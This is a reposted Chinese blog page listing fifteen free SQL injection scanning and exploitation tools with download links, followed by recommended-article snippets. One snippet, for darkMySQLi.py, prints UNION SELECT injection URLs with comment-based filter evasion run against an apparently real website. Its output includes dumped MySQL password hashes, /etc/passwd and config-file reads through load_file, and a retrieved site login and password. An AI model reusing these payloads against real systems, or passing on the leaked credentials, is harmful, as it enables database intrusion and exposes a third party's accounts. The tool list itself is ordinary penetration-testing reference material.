[转载]Top 15 free SQL Injection Scanners

最新推荐文章于 2025-06-30 20:00:00 发布
转载 最新推荐文章于 2025-06-30 20:00:00 发布 · 192 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/HappyQQ/archive/2008/08/02/1258967.html

本文汇总了多种用于发现和利用SQL注入漏洞的安全测试工具,包括SQLIer、SQLbftools、SQLInjectionBrute-forcer等。这些工具可以帮助安全研究人员自动化检测过程,深入探测应用程序中的SQL注入漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SQLIer - SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.
Code:
http://bcable.net/project.php?sqlier
SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.
Code:
http://www.reversing.org/node/view/11
SQL Injection Brute-forcer - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.
Code:
http://www.open-labs.org/sqlibf19beta1.tar.gz
SQLBrute - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Mcft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.
Code:
http://www.justinclarke.com/security/sqlbrute.py
BobCat - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.
Code:
http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
SQLMap - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.
Code:
http://sqlmap.sourceforge.net/
Absinthe - Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.
Code:
http://www.0x90.org/releases/absinthe/download.php
SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.
Code:
http://sqltool.itdefence.ru/indexeng.html
SQID - SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.
Code:
http://sqid.rubyforge.org/
Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.
Code:
http://www.unsec.net/download/bsqlbf.pl
SQL Power Injection Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.
Code:
http://www.sqlpowerinjector.com/
FJ-Injector Framwork - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.
Code:
http://sourceforge.net/project/showfiles.php?group_id=183841
SQLNinja - SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Mcft SQL Server as its back-end database. Get SQLNinja.
Code:
http://sqlninja.sourceforge.net/
Automagic SQL Injector - The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Mcft SQL injection holes where errors are returned. Get Automagic SQL Injector.
Code:
http://www.indianz.ch/tools/attack/automagic.zip
NGSS SQL Injector - NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.
Code:
http://www.indianz.ch/tools/attack/sqlinjector.zip

转载于:https://www.cnblogs.com/HappyQQ/archive/2008/08/02/1258967.html

linux渗透测试常用命令
AI拉呱,专注于人工智与网络安全方面的研究,关注一起学习。
08-07 400
【代码】linux渗透测试常用命令。
信息安全领域的个人防护指南——密码管理、网络攻防、操作系统、反病毒软件等
AI天才研究院
08-06 2106
2020年是信息安全行业的元年,数字化进程不断推进,各种攻击手段层出不穷,相关部门对个人信息安全保障的高度重视也正在得到提升。越来越多的人把注意力从传统安全保障转移到新的网络安全防护上来。本文将从个人防护角度,分享一些对个人信息安全进行全方位防护的知识和技巧。密码管理(Password Management)是指保管、管理、使用、共享用户账号和密码,确保用户信息安全的一项重要环节。可以帮助保护个人信息免受各种恶意攻击,促进网络安全运营,提高信息安全水平。
SQLi Dumper v.8.0(国外SQL网站注入工具)
10-18
网站渗透,爆数据库.Beyond SQLi: Obfuscate and Bypass |=--------------------------------------------------------------------=| |=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------=| |=-------------------------=[ 6 October 2011 ]=-----------------------=| |=----------------------=[ By CWH Underground ]=--------------------=| |=--------------------------------------------------------------------=| ###### Info ###### Title : Beyond SQLi: Obfuscate and Bypass Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" Team : CWH Underground [http://www.exploit-db.com/author/?a=1275]
免费的SQL Server工具可能让你的生活变得更轻松
weixin_34248258的博客
06-24 845
Free SQL Server tools that might make your life a little easier 更新:新的东西从最新的更新将是红色的。 This list will grow as I find new tools.这份名单将成长为我找到新的工具。 So if you know of some not on this list do post them in t...
国外Sql注入资料
weixin_33982670的博客
02-08 199
作者: zeroday 组织: blacksecurity.org 翻译:漂浮的尘埃[S.S.T] 1. 介绍 2.漏洞测试 3. 收集信息 4. 数据类型 5. 获取密码 6. 创建数据库帐号 7. MYSQL操作系统交互作用 8. 服务器名字与配置 9. 从注册表中获取VNC密码 10.逃避标识部分信号 11.用Char()进行MYS...
一个超好用的免费SQL查询工具~
weixin_42558851的博客
09-02 1056
好喜欢的一个SQL查询工具~
SQuirreL SQL:一个免费的通用数据库开发工具
最新发布
Tony.Dong的专栏
06-30 577
是一个免费开源、基于 Java 的 通用 SQL 客户端。它提供了一个统一的界面,让数据库管理员(DBA)、开发人员和分析师能够轻松地连接、查询和管理多种不同类型的关系型数据库。SQuirreL SQL 支持 Windows、Linux、macOS 操作系统。
Apache HTTP 过滤器filter、开源WAF(ModSecurity)、Apache 模块开发
西京刀客
03-08 3002
在编写Apache模块时,需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外,需要参考Apache的文档和API参考手册来编写代码和构建模块。
Metasploit 渗透测试
小能猫的博客
01-18 4284
┌──(root????kali)-[/home/kali/Desktop] └─# service postgresql start ┌──(root????kali)-[/home/kali/Desktop] └─# msfdb init [i] Database already started [+] Creating database user 'msf'...
java工程师笔试面试题
热门推荐
pamguangyou的专栏
02-08 2万+
1. J2EE 是什么?它包括哪些技术? 解答:从整体上讲,J2EE 是使用 Java 技术开发企业级应用的工业标准,它是 Java 技术不断适应和促进企业级应用过程中的产物.适用于企业级应用的 J2EE,提供一个平台独立的、可移植的、多用户的、安全的和基于标准的企业级平台,从而简化企业应用的开发、管理和部署。J2EE 是一个标准,而不是一个现成的产品。 主要包括以下这些技术: 1) Ser
强大的国外注入工具-darkMySQLi.py
09-22
darkMySQLi v.1.0 rsauron@gmail.com Usage: ./darkMySQLi.py [options] Options: -h, --help shows this help message and exits -d, --debug display URL debug information Target: -u URL, --url=URL Target url Methodology: -b, --blind Use blind methodology (req: --string) -s, --string String to match in page when the query is valid Method: --method=PUT Select to use PUT method Modes: --dbs Enumerate databases MySQL v5+ --schema Enumerate Information_schema (req: -D, opt: -T) MySQL v5+ --full Enumerate all we can MySQL v5+ --info MySQL Server configuration MySQL v4+ --fuzz Fuzz Tables & Columns Names MySQL v4+ --findcol Find Column length MySQL v4+ --dump Dump database table entries (req: -T, opt: -D, -C, --start, --stop) MySQL v4+ Define: -D DB database to enumerate -T TBL database table to enumerate -C COL database table column to enumerate Optional: --where=COL,VALUE Use a where clause in your dump --orderby=COL Use a orderby clause in your dump --proxy=PROXY Use a HTTP proxy to connect to the target url --output=FILE.TXT Output results of tool to this file 实例: darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --info |--------------------------------------------------| | rsauron@gmail.com v1.0 | | 1/2009 darkMySQLi.py | | -- Multi Purpose MySQL Injection Tool -- | | Usage: darkMySQLi.py [options] | | -h help darkc0de.com | |--------------------------------------------------| [+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10 [+] 14:06:17 [+] Evasion: /**/ -- [+] Cookie: None [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: db2889_rayner_en User: mysql2889@localhost Version: 5.0.32-Debian_7etch1-log [+] Do we have Access to MySQL Database: YES <-- w00t w00t [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+FROM+mysql .user-- [+] Dumping MySQL user info. host:user:password [+] Number of users in the mysql.user table: 6 [0] localhost:root:N [1] dlx35341:root:N [2] localhost:debian-sys-maint:*0EF29B1AED94CC60062FED7F4DF2224A0C880A10 [3] localhost:mysql2908:*6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD [4] localhost:mysql2970:*7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83 [5] localhost:mysql2889:*8050739003BBDB60551FA99B5FFF34957C4F5F49 [+] Do we have Access to Load_File: YES <-- w00t w00t [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10-- [+] Magic quotes are: OFF [+] Starting Load_File Fuzzer... [+] Number of system files to be fuzzed: 37 [!] Found /et@c/pa@sswd [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10-- [!] Found /et@c/hos@ts [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f686f737473),3,4,5,6,7,8,9,10-- [!] Found /et@c/m@otd [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d6f7464),3,4,5,6,7,8,9,10-- [!] Found /et@c/apach@e2/apache2.conf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f617061636865322e 636f6e66),3,4,5,6,7,8,9,10-- [!] Found /et@c/apa@che2/httpd.conf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f68747470642e636f 6e66),3,4,5,6,7,8,9,10-- [!] Found /et@c/ap@ache2/sites-available/default [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f617061636865322f73697465732d6176 61696c61626c652f64656661756c74),3,4,5,6,7,8,9,10-- [!] Found /et@c/m@ysql/my.cnf [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,LOAD_FILE(0x2f6574632f6d7973716c2f6d792e636e66),3,4,5, 6,7,8,9,10-- [-] 14:06:43 [-] Total URL Requests: 48 [-] Done info dump with where clause option and debug turned on darkc0de:darkMySQLi rsauron$ ./darkMySQLi.py -u "http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4, 5,6,7,8,9,10" --dump -D db2889_rayner_en -T auth -C name,pass --where pass,ridley --debug |--------------------------------------------------| | rsauron@gmail.com v1.0 | | 1/2009 darkMySQLi.py | | -- Multi Purpose MySQL Injection Tool -- | | Usage: darkMySQLi.py [options] | | -h help darkc0de.com | |--------------------------------------------------| [+] URL: http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,darkc0de,3,4,5,6,7,8,9,10 [+] 14:17:43 [+] Evasion: /**/ -- [+] Cookie: None [-] Proxy Not Given [+] Gathering MySQL Server Configuration... [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x6461726b63306465,0x1e,version(),0x1e,user (),0x1e,database(),0x1e,0x6461726b63306465),3,4,5,6,7,8,9,10-- Database: db2889_rayner_en User: mysql2889@localhost Version: 5.0.32-Debian_7etch1-log [+] Dumping data from database "db2889_rayner_en" Table "auth" [+] and Column(s) ['name', 'pass'] [+] WHERE clause: WHERE+pass=0x7269646c6579 [+] ORDERBY clause: [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,COUNT(*),0x1e,0x20),3,4,5,6,7,8,9 ,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579-- [+] Number of Rows: 1 [debug] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(0x1e,0x1e,name,0x1e,pass,0x1e,0x1e,0x20),3, 4,5,6,7,8,9,10/**/FROM/**/db2889_rayner_en.auth/**/WHERE/**/pass=0x7269646c6579/**//**/LIMIT/**/0,1-- [1] rayneriol:ridley: [-] 14:17:45 [-] Total URL Requests: 3 [-] Done 具体用户请看提示帮助
超级SQL注入工具【SSQLInjection】V1.0 正式版 20180809
10-23
软件运行需要.net framework 4.0,如未安装,请自行百度下载安装。
sql注入工具
11-27
sql注入工具 domian 很不错的一个工具 可以试试 sql注入工具
《5大著名免费SQL注入工具》
08-13
5大著名免费SQL注入工具。文档介绍. 5大著名免费SQL注入工具。文档介绍.
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库
免费的SQL Server 2005管理工具
lixinghuazsu的专栏
07-17 3370
这可能是我用过最好用的SQL工具,免费还免安装,良心推荐SQL Studio
ylguoguo6666的博客
03-28 2万+
数据库管理工具,是后端程序员使用频率非常高的的工具。Navicat、DataGrip虽然很好用,但都是收费的。最近发现了一款免费的数据库管理工具SQL Studio,界面非常简洁推荐给大家!
Navicat平替?一款超级强大的免费SQL工具推荐
GongXi20000608_的博客
02-23 3352
今年国产软件出头,Web版数据库管理工具SQL Studio颠覆市场,SQL Studio在今年口碑大火,成为数据库管理工具市场的一匹黑马,SQL Studio究竟如何?有什么优点?
免费、开源、好用的 SQL 客户端合集
leyang0910的博客
06-15 4884
支持包括 PostgreSQL、Redshift、MySQL、MariaDB、SQL Server、Cassandra 和 SQLite 在内的多种数据库系统。支持包括 MariaDB、MySQL、MS SQL、PostgreSQLSQLite、Interbase和 Firebird 在内的多种数据库系统。一个老牌的 SQL 客户端,除了基本的可视化和管理功能外,还具备 SQL 编辑器、数据和架构迁移能力、监控数据库连接等功能。
Scanners-Box扫描器工具合集发布
资源摘要信息:"Scanners-Box扫描器合集.zip" Scanners-Box是一个包含多种扫描器工具的压缩包文件,从提供的信息来看,这个合集可能包括了各种不同用途的扫描工具,这些工具能够帮助用户进行网络扫描、安全检测、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值